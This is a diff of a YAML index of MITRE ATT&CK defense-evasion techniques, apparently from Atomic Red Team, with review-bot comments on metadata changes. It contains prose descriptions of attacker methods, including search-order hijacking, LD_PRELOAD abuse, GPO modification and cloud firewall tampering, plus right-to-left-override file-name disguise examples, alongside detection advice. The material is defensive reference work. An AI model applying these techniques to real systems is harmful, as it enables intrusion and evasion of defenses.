name: 'Subvert Trust Controls: Code Signing Policy Modification'
x_mitre_detection: 'Monitor processes and command-line arguments for actions
@@ -5282,12 +5420,11 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.006
atomic_tests: []
T1610:
technique:
- modified: '2024-04-11T21:24:42.680Z'
+ modified: '2024-10-15T15:06:17.124Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -5366,7 +5503,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1610
atomic_tests: []
T1112:
@@ -5451,12 +5587,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1112
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -5475,6 +5610,7 @@ defense-evasion:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -5482,7 +5618,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -5502,29 +5637,31 @@ defense-evasion:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1535:
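Review bot: the `Windows NT Command Shell` reference keeps its `Retrieved December 5, 2014` date and `docs.microsoft.com/en-us/previous-versions` URL while the neighbouring `Microsoft CreateProcess` and `Microsoft WinExec` entries are refreshed to `learn.microsoft.com` URLs with September 12, 2024 retrieval dates; the two `msdn.microsoft.com/en-us/library/...` links being replaced here are of the same vintage, so it is worth checking that the remaining `previous-versions` link still resolves rather than leaving one stale reference in a block that was otherwise brought up to date. The rest of the hunk is a reorder of `external_references` plus the added `revoked: false`, with no content change.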
@@ -5575,7 +5712,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.001:
technique:
@@ -5642,12 +5778,11 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1027.001
atomic_tests: []
T1484.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-23T22:11:01.884Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
@@ -5683,6 +5818,10 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_deprecated: false
x_mitre_detection: |-
It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
@@ -5694,16 +5833,12 @@ defense-evasion:
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.0'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Active Directory: Active Directory Object Creation'
@@ -5739,12 +5874,12 @@ defense-evasion:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
- You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
- url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+ You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -5752,14 +5887,13 @@ defense-evasion:
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.001
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -5774,6 +5908,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -5782,18 +5917,18 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -5825,14 +5960,11 @@ defense-evasion:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -5953,7 +6085,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1070.001:
@@ -6027,12 +6158,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.001
atomic_tests: []
T1222:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T17:54:06.038Z'
name: File and Directory Permissions Modification
description: "Adversaries may modify file or directory permissions/attributes
to evade access control lists (ACLs) and access protected files.(Citation:
@@ -6129,12 +6259,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222
atomic_tests: []
T1548:
technique:
- modified: '2024-04-15T20:52:09.908Z'
+ modified: '2024-10-15T15:32:21.811Z'
name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
@@ -6166,11 +6295,10 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- IaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'User Account: User Account Modification'
@@ -6211,11 +6339,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T21:14:37.714Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)
@@ -6271,12 +6398,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.002
atomic_tests: []
T1548.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-15T18:43:20.995Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -6333,7 +6459,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.001
atomic_tests: []
T1218.008:
@@ -6369,7 +6494,7 @@ defense-evasion:
description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November
20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit
Against Russian Banks. Retrieved March 7, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:52:49.877Z'
name: 'Signed Binary Proxy Execution: Odbcconf'
description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious
payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
@@ -6402,13 +6527,11 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.008
atomic_tests: []
T1548.005:
technique:
- modified: '2024-03-28T15:30:09.313Z'
+ modified: '2024-10-15T16:07:49.519Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -6470,10 +6593,9 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -6531,7 +6653,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.013:
technique:
@@ -6573,7 +6694,7 @@ defense-evasion:
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:43:48.848Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
@@ -6632,41 +6753,10 @@ defense-evasion:
- Administrator
- SYSTEM
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1578.003:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
- type: attack-pattern
- created: '2020-06-16T17:23:06.508Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.003
- url: https://attack.mitre.org/techniques/T1578/003
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS CloudTrail Search
- url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
- Retrieved June 17, 2020.
- - source_name: Azure Activity Logs
- url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
- description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
- 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.415Z'
name: Delete Cloud Instance
description: |-
An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
@@ -6675,20 +6765,50 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: |-
The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
In AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances
event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete
to delete a VM.(Citation: Cloud Audit Logs)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Instance: Instance Metadata'
- 'Instance: Instance Deletion'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+ created: '2020-06-16T17:23:06.508Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/003
+ external_id: T1578.003
+ - source_name: AWS CloudTrail Search
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure Activity Logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1574.005:
technique:
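Review bot: `x_mitre_permissions_required:` / `- User` is removed in this hunk and is not re-added anywhere in the block that recreates the technique's `type`, `id`, `created`, `external_references` and `object_marking_refs` below it, so unlike the rest of the T1578.003 change (which only moves `x_mitre_platforms`, `x_mitre_domains` and the references into the new key order) this is a real field removal; confirm it is intentional, for example because upstream ATT&CK no longer populates that field, and call it out in the commit message. Also, the `Mandiant M-Trends 2020` URL changes from `content.fireeye.com/m-trends/rpt-m-trends-2020` to a `mandiant.com/.../mtrends-2020.pdf` PDF while its `Retrieved April 24, 2020` date is unchanged; a retrieval date that predates the URL it describes is a minor inconsistency worth a follow-up.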
@@ -6718,7 +6838,7 @@ defense-evasion:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -6753,8 +6873,6 @@ defense-evasion:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1562.006:
technique:
@@ -6845,12 +6963,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.006
atomic_tests: []
T1562.007:
technique:
- modified: '2023-04-15T00:25:36.502Z'
+ modified: '2024-10-16T19:38:57.374Z'
name: Disable or Modify Cloud Firewall
description: "Adversaries may disable or modify a firewall within a cloud environment
to bypass controls that limit access to cloud resources. Cloud firewalls are
@@ -6858,19 +6975,25 @@ defense-evasion:
Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
typically utilize restrictive security groups and firewall rules that only
allow network activity from trusted IP addresses via expected ports and protocols.
- An adversary may introduce new firewall rules or policies to allow access
- into a victim cloud environment. For example, an adversary may use a script
- or utility that creates new ingress rules in existing security groups to allow
- any TCP/IP connectivity, or remove networking limitations to support traffic
- associated with malicious activity (such as cryptomining).(Citation: Expel
- IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials
- 2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications,
- lateral movement, and/or data exfiltration that would otherwise not be allowed."
+ An adversary with appropriate permissions may introduce new firewall rules
+ or policies to allow access into a victim cloud environment and/or move laterally
+ from the cloud control plane to the data plane. For example, an adversary
+ may use a script or utility that creates new ingress rules in existing security
+ groups (or creates new security groups entirely) to allow any TCP/IP connectivity
+ to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud
+ Compute Credentials 2022) They may also remove networking limitations to support
+ traffic associated with malicious activity (such as cryptomining).(Citation:
+ Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute
+ Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary
+ C2 communications, lateral movement, and/or data exfiltration that would otherwise
+ not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110)
+ or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_contributors:
- Expel
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor cloud logs for modification or creation of new security
groups or firewall rules.
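Review bot: the rewritten description string ends with a trailing space before the closing quote (`[Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "`), which every consumer of this field will inherit; if the generator copies the upstream STIX description verbatim this is an upstream artefact to report there, otherwise strip it before merging. The added `Arun Seelagan, CISA` contributor and the `x_mitre_version` bump from `1.2` to `1.3` in the next hunk are consistent with the expanded description.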
@@ -6879,7 +7002,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Firewall: Firewall Disable'
- 'Firewall: Firewall Rule Modification'
@@ -6902,9 +7025,8 @@ defense-evasion:
url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.002:
technique:
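Review bot: `spec_version: '2.1'` is dropped from this object with no replacement, and the same deletion repeats for every technique in this diff. `spec_version` is a required property on STIX 2.1 objects, so if this YAML is meant to stay loadable as STIX content this is a regression; if the field was removed on purpose because the file is only an Atomic Red Team index, the commit message should say so. The `x_mitre_attack_spec_version` bump to 3.2.0 here is consistent with the 1.2 to 1.3 version bump in the previous hunk.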
@@ -6937,7 +7059,7 @@ defense-evasion:
description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
- Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
Retrieved April 22, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T21:01:59.733Z'
name: Right-to-Left Override
description: |-
Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \u202Excod.scr
will display as March 25 rcs.docx
. A JavaScript file named photo_high_re\u202Egnp.js
will be displayed as photo_high_resj.png
.(Citation: Infosecinstitute RTLO Technique)
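Review bot: `modified` for T1036.002 moves backwards, from 2022-04-25 to 2021-10-14, and the same regression appears on most objects in this diff (T1542.002, T1055.004, T1647, T1600.002, T1612, T1055.002, T1218.012, T1218.005, T1205.001, T1564.002, T1562.003, T1556.008). The old values all carry the identical `T14:00:00.188Z` time of day, which looks like a bulk release stamp rather than a per-object edit time, so the new values are probably the genuine upstream timestamps; please name the source bundle in the commit message and say why timestamps go back in time, since any consumer that syncs on `modified` will otherwise treat these objects as older than what it already has.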
@@ -6956,8 +7078,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542.002:
technique:
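Review bot: this hunk removes `x_mitre_attack_spec_version: 2.1.0` from T1036.002 without adding a replacement, whereas T1562.007 above is bumped to 3.2.0 and T1647, T1218.012 and T1564.002 below keep 2.1.0, so after this diff the same field has three different outcomes across the file. T1542.002, T1055.004, T1600.002, T1055.002, T1218.005 and T1205.001 lose the field the same way. If the regenerated objects come from sources of different vintage, that deserves a sentence in the commit message; otherwise the missing values should be restored so every object carries the field.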
@@ -6988,7 +7108,7 @@ defense-evasion:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-01T20:43:55.632Z'
name: Component Firmware
description: |-
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -7018,12 +7138,10 @@ defense-evasion:
- SYSTEM
x_mitre_system_requirements:
- Ability to update component device firmware from the host operating system.
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:59:22.125Z'
name: Indicator Removal on Host
description: |-
Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
@@ -7049,9 +7167,8 @@ defense-evasion:
- Windows
- Containers
- Network
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Scheduled Job: Scheduled Job Modification'
- 'File: File Modification'
